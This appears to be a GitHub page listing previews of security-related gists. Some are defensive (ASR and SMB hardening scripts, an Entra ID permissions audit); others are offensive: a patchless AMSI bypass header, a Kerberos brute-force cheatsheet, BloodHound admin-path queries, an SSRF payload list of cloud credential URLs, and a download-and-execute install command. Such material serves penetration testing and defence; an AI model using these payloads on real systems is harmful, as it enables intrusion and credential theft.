Michael Ritter michiiii

@mgeeky
mgeeky / Configure-ASR.ps1
Created December 28, 2022 12:13
A little script that configures all Microsoft Defender Attack Surface Reduction (ASR) rules at once to a specific state. Example: PS> .\Configure-ASR.ps1 -State Enabled
#Requires -RunAsAdministrator
<#
.SYNOPSIS
Script used to manage state of Microsoft Defender's Attack Surface Reduction rules.
Configures all ASR rules into mode defined in -State parameter.
.PARAMETER State
Tells how to configure all ASR rules available. Valid options:
- Disable (Disable the ASR rule)
@CCob
CCob / patchless_amsi.h
Created April 17, 2022 16:18
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
# Enable Windows Firewall
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True
# SMB # require elevated privileges #
## Turn on SMB signing and encryption
Set-SmbServerConfiguration -RequireSecuritySignature $True -EnableSecuritySignature $True -EncryptData $True -Confirm:$false -Verbose
## Turn off the default workstations shares
Set-SmbServerConfiguration -AutoShareWorkstation $False -Confirm:$false -Verbose
@HarmJ0y
HarmJ0y / Jenkinsfile
Created November 2, 2020 23:15
Rubeus Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL: https://github.com/GhostPack/Seatbelt
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = "https://github.com/GhostPack/Seatbelt"
@s0h3ck
s0h3ck / notes
Last active December 25, 2022 04:06
Quick Discord Notes - Training: Active Defense & Cyber Deception w/ John Strand [04-09-2020]
AV Products or Companies:
Avast
BitDefender
Carbon Black
Check Point
Cisco
ClamAV
CrowdStrike
Cylance
Elastic Endpoint Security
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@jeffmcjunkin
jeffmcjunkin / gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
Last active November 12, 2023 16:35
Useful Cypher queries for BloodHound
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer)
RETURN u.name
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------
MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,
@jhaddix
jhaddix / cloud_metadata.txt
Last active April 25, 2024 11:19 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@psignoret
psignoret / Get-AzureADPSPermissions.ps1
Last active April 24, 2024 18:12
Script to list all delegated permissions and application permissions in Microsoft Entra ID
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" }
<#
@mikepsinn
mikepsinn / install-choco-script.bat
Last active December 30, 2021 13:36
Windows server Choco automated install script
:: Download this and execute as admin
:: Install choco .exe and add choco to PATH
@powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))" && SET "PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin"
choco feature enable -n allowGlobalConfirmation
:: Just install node stuff manually. Trust me.
:: choco install nodejs-lts --install-directory='C:\nodejs' -fy
:: npm install -g gulp cordova@6.5.0 ionic@2.2.3 bower